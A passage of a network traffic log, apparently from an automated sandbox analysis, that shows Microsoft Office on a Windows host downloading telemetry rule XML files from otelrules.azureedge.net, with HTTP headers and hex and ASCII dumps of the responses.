                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201224Z-174c587ffdf9xbcchC1TEBxkz4000000035g00000000p8zm
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    14192.168.2.54973313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 2160
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201224Z-174c587ffdfb5q56hC1TEB04kg00000003ag00000000bgsg
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    15192.168.2.54973813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 632
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 81892826-901e-00ac-7050-3cb69e000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201227Z-15b8b599d889gj5whC1TEBfyk0000000037g00000000b9pw
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    16192.168.2.54973613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 02a2c6fa-b01e-0001-107b-3b46e2000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201227Z-178bfbc474btrnf9hC1NYCb80g000000052000000000e2wz
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    17192.168.2.54973913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201227Z-174c587ffdfldtt2hC1TEBwv9c000000034000000000rz7u
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    18192.168.2.54973713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201227Z-15b8b599d88f9wfchC1TEBm2kc00000003g000000000dh3y
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    19192.168.2.54974013.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 467
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 929cab26-201e-000c-4067-3d79c4000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201227Z-174c587ffdfldtt2hC1TEBwv9c00000003b0000000001t06
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:27 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    20192.168.2.54974213.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201229Z-15b8b599d889fz52hC1TEB59as00000003e00000000063bb
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    21192.168.2.54974113.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 5235ff2f-501e-008f-1c4e-3c9054000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201229Z-178bfbc474bpscmfhC1NYCfc2c00000003mg000000003cge
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    22192.168.2.54974313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:29 GMT
